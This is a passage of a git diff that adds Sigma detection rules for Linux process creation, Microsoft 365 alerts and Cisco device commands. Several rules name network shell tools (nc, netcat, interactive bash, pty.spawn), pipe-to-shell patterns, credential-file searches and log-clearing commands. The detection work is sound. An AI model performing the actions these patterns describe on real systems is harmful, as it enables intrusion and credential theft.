- '/.zsh_history' + - CommandLine|endswith: '_history' + condition: all of selection* +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.reconnaissance + - attack.t1592.004 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml new file mode 100644 index 000000000..6009d43ce --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -0,0 +1,30 @@ +title: Interactive Bash Suspicious Children +id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 +status: experimental +description: Detects suspicious interactive bash as a parent to rather uncommon child processes +references: + - Internal Research +date: 2022/03/14 +author: Florian Roth +logsource: + product: linux + category: process_creation +detection: + selection: + ParentCommandLine: 'bash -i' + anomaly1: + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' + anomaly2: + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' + condition: selection and 1 of anomaly* +falsepositives: + - Legitimate software that uses these patterns +level: medium diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml new file mode 100644 index 000000000..4e71ecba4 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml @@ -0,0 +1,32 @@ +title: Suspicious Java Children Processes +id: d292e0af-9a18-420c-9525-ec0ac3936892 +status: experimental +description: Detects java process spawning suspicious children +author: Nasreddine Bencherchali +date: 2022/06/03 +references: + - https://www.tecmint.com/different-types-of-linux-shells/ +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: linux +detection: + selection: + ParentImage|endswith: '/java' + CommandLine|contains: + - '/bin/sh' + - 'bash' + - 'dash' + - 'ksh' + - 'zsh' + - 'csh' + - 'fish' + - 'curl' + - 'wget' + - 'python' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml new file mode 100644 index 000000000..e89e239d6 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -0,0 +1,28 @@ +title: Linux Shell Pipe to Shell +id: 880973f3-9708-491c-a77b-2a35a1921158 +status: experimental +description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell +references: + - Internal Research +date: 2022/03/14 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + CommandLine|endswith: + - '| bash' + - '|bash' + - '| sh' + - '|sh' + condition: selection +falsepositives: + - Legitimate software that uses these patterns +level: medium diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml new file mode 100644 index 000000000..190477e5a --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml @@ -0,0 +1,25 @@ +title: Linux Recon Indicators +id: 0cf7a157-8879-41a2-8f55-388dd23746b7 +status: experimental +description: Detects events with patterns found in commands used for reconnaissance on linux systems +author: Florian Roth +references: + - https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py +date: 2022/06/20 +logsource: + category: process_creation + product: linux +detection: + selection: + CommandLine|contains: + - ' -name .htpasswd' + - ' -perm -4000 ' + condition: selection +falsepositives: + - Legitimate administration activities +level: high +tags: + - attack.reconnaissance + - attack.t1592.004 + - attack.credential_access + - attack.t1552.001 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml new file mode 100644 index 000000000..8bec4ce24 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml @@ -0,0 +1,29 @@ +title: System Information Discovery +id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 +status: stable +description: Detects system information discovery commands +author: Ömer Günal, oscd.community +date: 2020/10/08 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +tags: + - attack.discovery + - attack.t1082 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/uname' + - '/hostname' + - '/uptime' + - '/lspci' + - '/dmidecode' + - '/lscpu' + - '/lsmod' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml new file mode 100644 index 000000000..b013e068b --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml @@ -0,0 +1,27 @@ +title: System Network Connections Discovery +id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 +status: test +description: Detects usage of system utilities to discover system network connections +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/who' + - '/w' + - '/last' + - '/lsof' + - '/netstat' + condition: selection +falsepositives: + - Legitimate activities +level: low +tags: + - attack.discovery + - attack.t1049 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml new file mode 100644 index 000000000..891e743f3 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -0,0 +1,33 @@ +title: System Network Discovery - Linux +id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa +status: test +description: Detects enumeration of local network configuration +author: Ömer Günal and remotephone, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md +date: 2020/10/06 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection1: + Image|endswith: + - '/firewall-cmd' + - '/ufw' + - '/iptables' + - '/netstat' + - '/ss' + - '/ip' + - '/ifconfig' + - '/systemd-resolve' + - '/route' + selection2: + CommandLine|contains: '/etc/resolv.conf' + condition: selection1 or selection2 +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.t1016 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml new file mode 100644 index 000000000..2d6feee4a --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml @@ -0,0 +1,42 @@ +title: Linux Webshell Indicators +id: 818f7b24-0fba-4c49-a073-8b755573b9c7 +status: experimental +description: Detects suspicious sub processes of web server processes +references: + - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ +date: 2021/10/15 +modified: 2022/06/03 +author: Florian Roth +tags: + - attack.persistence + - attack.t1505.003 +logsource: + product: linux + category: process_creation +detection: + selection_general: + ParentImage|endswith: + - '/httpd' + - '/lighttpd' + - '/nginx' + - '/apache2' + - '/node' + - '/caddy' + selection_tomcat: + ParentCommandLine|contains|all: + - '/bin/java' + - 'tomcat' + selection_websphere: # ? just guessing + ParentCommandLine|contains|all: + - '/bin/java' + - 'websphere' + selection_sub_processes: + Image|endswith: + - '/whoami' + - '/ifconfig' + - '/usr/bin/ip' + - '/bin/uname' + condition: selection_sub_processes and ( selection_general or selection_tomcat or selection_websphere) +falsepositives: + - Web applications that invoke Linux command line tools +level: high diff --git a/bin/main/rules/m365/microsoft365_activity_by_terminated_user.yml b/bin/main/rules/m365/microsoft365_activity_by_terminated_user.yml new file mode 100644 index 000000000..70d11dba8 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_activity_by_terminated_user.yml @@ -0,0 +1,26 @@ +title: Activity Performed by Terminated User +id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee +status: test +description: | + Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. + This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity performed by terminated user' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/bin/main/rules/m365/microsoft365_activity_from_anonymous_ip_addresses.yml new file mode 100644 index 000000000..029f859f8 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -0,0 +1,25 @@ +title: Activity from Anonymous IP Addresses +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 +status: test +description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.command_and_control + - attack.t1573 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from anonymous IP addresses' + status: success + condition: selection +falsepositives: + - User using a VPN or Proxy +level: medium diff --git a/bin/main/rules/m365/microsoft365_activity_from_infrequent_country.yml b/bin/main/rules/m365/microsoft365_activity_from_infrequent_country.yml new file mode 100644 index 000000000..01002c7b6 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_activity_from_infrequent_country.yml @@ -0,0 +1,25 @@ +title: Activity from Infrequent Country +id: 0f2468a2-5055-4212-a368-7321198ee706 +status: test +description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.command_and_control + - attack.t1573 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from infrequent country' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/bin/main/rules/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml new file mode 100644 index 000000000..9453776be --- /dev/null +++ b/bin/main/rules/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -0,0 +1,25 @@ +title: Data Exfiltration to Unsanctioned Apps +id: 2b669496-d215-47d8-bd9a-f4a45bf07cda +status: test +description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1537 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Data exfiltration to unsanctioned apps' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_from_susp_ip_addresses.yml b/bin/main/rules/m365/microsoft365_from_susp_ip_addresses.yml new file mode 100644 index 000000000..343b5466d --- /dev/null +++ b/bin/main/rules/m365/microsoft365_from_susp_ip_addresses.yml @@ -0,0 +1,27 @@ +title: Activity from Suspicious IP Addresses +id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 +status: test +description: | + Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. + These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.command_and_control + - attack.t1573 +logsource: + service: threat_detection + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Activity from suspicious IP addresses' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_impossible_travel_activity.yml b/bin/main/rules/m365/microsoft365_impossible_travel_activity.yml new file mode 100644 index 000000000..14b3c7700 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_impossible_travel_activity.yml @@ -0,0 +1,25 @@ +title: Microsoft 365 - Impossible Travel Activity +id: d7eab125-5f94-43df-8710-795b80fa1189 +status: test +description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2020/07/06 +modified: 2021/11/27 +tags: + - attack.initial_access + - attack.t1078 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Impossible travel activity' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_logon_from_risky_ip_address.yml b/bin/main/rules/m365/microsoft365_logon_from_risky_ip_address.yml new file mode 100644 index 000000000..2ba14c9d4 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_logon_from_risky_ip_address.yml @@ -0,0 +1,25 @@ +title: Logon from a Risky IP Address +id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f +status: test +description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.initial_access + - attack.t1078 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Log on from a risky IP address' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_new_federated_domain_added.yml b/bin/main/rules/m365/microsoft365_new_federated_domain_added.yml new file mode 100644 index 000000000..0218141b3 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_new_federated_domain_added.yml @@ -0,0 +1,27 @@ +title: New Federated Domain Added +id: 42127bdd-9133-474f-a6f1-97b6c08a4339 +status: test +description: Alert for the addition of a new federated domain. +references: + - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf + - https://us-cert.cisa.gov/ncas/alerts/aa21-008a + - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html + - https://www.sygnia.co/golden-saml-advisory + - https://o365blog.com/post/aadbackdoor/ +author: '@ionsor' +date: 2022/02/08 +tags: + - attack.persistence + - attack.t1136.003 +logsource: + service: exchange + product: m365 +detection: + selection: + eventSource: Exchange + eventName: 'Add-FederatedDomain' + status: success + condition: selection +falsepositives: + - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. +level: medium diff --git a/bin/main/rules/m365/microsoft365_potential_ransomware_activity.yml b/bin/main/rules/m365/microsoft365_potential_ransomware_activity.yml new file mode 100644 index 000000000..6ca1f523b --- /dev/null +++ b/bin/main/rules/m365/microsoft365_potential_ransomware_activity.yml @@ -0,0 +1,25 @@ +title: Microsoft 365 - Potential Ransomware Activity +id: bd132164-884a-48f1-aa2d-c6d646b04c69 +status: test +description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: austinsonger +date: 2021/08/19 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1486 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Potential ransomware activity' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_pst_export_alert.yml b/bin/main/rules/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..03c2e2309 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_pst_export_alert.yml @@ -0,0 +1,28 @@ +title: PST Export Alert Using eDiscovery Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +related: + - id: 6897cd82-6664-11ed-9022-0242ac120002 + type: similar +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +references: + - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide +author: Sorina Ionescu +date: 2022/02/08 +modified: 2022/11/17 +tags: + - attack.collection + - attack.t1114 +logsource: + service: threat_management + product: m365 + definition: Requires the 'eDiscovery search or exported' alert to be enabled +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium diff --git a/bin/main/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml b/bin/main/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml new file mode 100644 index 000000000..58e939a46 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml @@ -0,0 +1,28 @@ +title: PST Export Alert Using New-ComplianceSearchAction +id: 6897cd82-6664-11ed-9022-0242ac120002 +related: + - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 + type: similar +status: experimental +description: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud. +references: + - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps +author: Nikita Khalimonenkov +date: 2022/11/17 +tags: + - attack.collection + - attack.t1114 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + Payload|contains|all: + - 'New-ComplianceSearchAction' + - 'Export' + - 'pst' + condition: selection +falsepositives: + - Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored. +level: medium diff --git a/bin/main/rules/m365/microsoft365_susp_inbox_forwarding.yml b/bin/main/rules/m365/microsoft365_susp_inbox_forwarding.yml new file mode 100644 index 000000000..f7f74a5dd --- /dev/null +++ b/bin/main/rules/m365/microsoft365_susp_inbox_forwarding.yml @@ -0,0 +1,25 @@ +title: Suspicious Inbox Forwarding +id: 6c220477-0b5b-4b25-bb90-66183b4089e8 +status: test +description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/22 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1020 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Suspicious inbox forwarding' + status: success + condition: selection +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/m365/microsoft365_susp_oauth_app_file_download_activities.yml b/bin/main/rules/m365/microsoft365_susp_oauth_app_file_download_activities.yml new file mode 100644 index 000000000..d6dc40733 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_susp_oauth_app_file_download_activities.yml @@ -0,0 +1,24 @@ +title: Suspicious OAuth App File Download Activities +id: ee111937-1fe7-40f0-962a-0eb44d57d174 +status: test +description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: Austin Songer @austinsonger +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.exfiltration +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Suspicious OAuth app file download activities' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_unusual_volume_of_file_deletion.yml b/bin/main/rules/m365/microsoft365_unusual_volume_of_file_deletion.yml new file mode 100644 index 000000000..ff0b26d54 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_unusual_volume_of_file_deletion.yml @@ -0,0 +1,25 @@ +title: Microsoft 365 - Unusual Volume of File Deletion +id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd +status: test +description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: austinsonger +date: 2021/08/19 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'Unusual volume of file deletion' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/m365/microsoft365_user_restricted_from_sending_email.yml b/bin/main/rules/m365/microsoft365_user_restricted_from_sending_email.yml new file mode 100644 index 000000000..218f9d3e2 --- /dev/null +++ b/bin/main/rules/m365/microsoft365_user_restricted_from_sending_email.yml @@ -0,0 +1,25 @@ +title: Microsoft 365 - User Restricted from Sending Email +id: ff246f56-7f24-402a-baca-b86540e3925c +status: test +description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email. +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +author: austinsonger +date: 2021/08/19 +modified: 2022/10/09 +tags: + - attack.initial_access + - attack.t1199 +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'User restricted from sending email' + status: success + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_clear_logs.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_clear_logs.yml new file mode 100644 index 000000000..2b1d1ff0d --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_clear_logs.yml @@ -0,0 +1,28 @@ +title: Cisco Clear Logs +id: ceb407f6-8277-439b-951f-e4210e3ed956 +status: test +description: Clear command history in network OS which is used for defense evasion +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'clear logging' + - 'clear archive' + condition: keywords +fields: + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address +falsepositives: + - Legitimate administrators may run these commands +level: high +tags: + - attack.defense_evasion + - attack.t1070.003 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_collect_data.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_collect_data.yml new file mode 100644 index 000000000..a3c03bf52 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_collect_data.yml @@ -0,0 +1,34 @@ +title: Cisco Collect Data +id: cd072b25-a418-4f98-8ebc-5093fb38fe1a +status: test +description: Collect pertinent data from the configuration files +author: Austin Clark +date: 2019/08/11 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'show running-config' + - 'show startup-config' + - 'show archive config' + - 'more' + condition: keywords +fields: + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address +falsepositives: + - Commonly run by administrators +level: low +tags: + - attack.discovery + - attack.credential_access + - attack.collection + - attack.t1087.001 + - attack.t1552.001 + - attack.t1005 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml new file mode 100644 index 000000000..35510c62e --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml @@ -0,0 +1,31 @@ +title: Cisco Crypto Commands +id: 1f978c6a-4415-47fb-aca5-736a44d7ca3d +status: test +description: Show when private keys are being exported from the device, or when new certificates are installed +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'crypto pki export' + - 'crypto pki import' + - 'crypto pki trustpoint' + condition: keywords +fields: + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address +falsepositives: + - Not commonly run by administrators. Also whitelist your known good certificates +level: high +tags: + - attack.credential_access + - attack.defense_evasion + - attack.t1553.004 + - attack.t1552.004 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_disable_logging.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_disable_logging.yml new file mode 100644 index 000000000..d90b34743 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_disable_logging.yml @@ -0,0 +1,28 @@ +title: Cisco Disabling Logging +id: 9e8f6035-88bf-4a63-96b6-b17c0508257e +status: test +description: Turn off logging locally or remote +author: Austin Clark +date: 2019/08/11 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'no logging' + - 'no aaa new-model' + condition: keywords +fields: + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1562.001 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_discovery.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_discovery.yml new file mode 100644 index 000000000..21f2741f0 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_discovery.yml @@ -0,0 +1,45 @@ +title: Cisco Discovery +id: 9705a6a1-6db6-4a16-a987-15b7151e299b +status: test +description: Find information about network devices that is not stored in config files +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'dir' + - 'show processes' + - 'show arp' + - 'show cdp' + - 'show version' + - 'show ip route' + - 'show ip interface' + - 'show ip sockets' + - 'show users' + - 'show ssh' + - 'show clock' + condition: keywords +fields: + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address +falsepositives: + - Commonly used by administrators for troubleshooting +level: low +tags: + - attack.discovery + - attack.t1083 + - attack.t1201 + - attack.t1057 + - attack.t1018 + - attack.t1082 + - attack.t1016 + - attack.t1049 + - attack.t1033 + - attack.t1124 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_dos.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_dos.yml new file mode 100644 index 000000000..bdedcfc76 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_dos.yml @@ -0,0 +1,27 @@ +title: Cisco Denial of Service +id: d94a35f0-7a29-45f6-90a0-80df6159967c +status: test +description: Detect a system being shutdown or put into different boot mode +author: Austin Clark +date: 2019/08/15 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'shutdown' + - 'config-register 0x2100' + - 'config-register 0x2142' + condition: keywords +fields: + - CmdSet +falsepositives: + - Legitimate administrators may run these commands, though rarely. +level: medium +tags: + - attack.impact + - attack.t1495 + - attack.t1529 + - attack.t1565.001 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_file_deletion.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_file_deletion.yml new file mode 100644 index 000000000..4e35a0dd1 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_file_deletion.yml @@ -0,0 +1,28 @@ +title: Cisco File Deletion +id: 71d65515-c436-43c0-841b-236b1f32c21e +status: test +description: See what files are being deleted from flash file systems +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'erase' + - 'delete' + - 'format' + condition: keywords +fields: + - CmdSet +falsepositives: + - Will be used sometimes by admins to clean up local flash space +level: medium +tags: + - attack.defense_evasion + - attack.impact + - attack.t1070.004 + - attack.t1561.001 + - attack.t1561.002 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_input_capture.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_input_capture.yml new file mode 100644 index 000000000..bf429a053 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_input_capture.yml @@ -0,0 +1,25 @@ +title: Cisco Show Commands Input +id: b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b +status: test +description: See what commands are being input into the device by other people, full credentials can be in the history +author: Austin Clark +date: 2019/08/11 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'show history' + - 'show history all' + - 'show logging' + condition: keywords +fields: + - CmdSet +falsepositives: + - Not commonly run by administrators, especially if remote logging is configured +level: medium +tags: + - attack.credential_access + - attack.t1552.003 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_local_accounts.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_local_accounts.yml new file mode 100644 index 000000000..4d579b008 --- /dev/null +++ 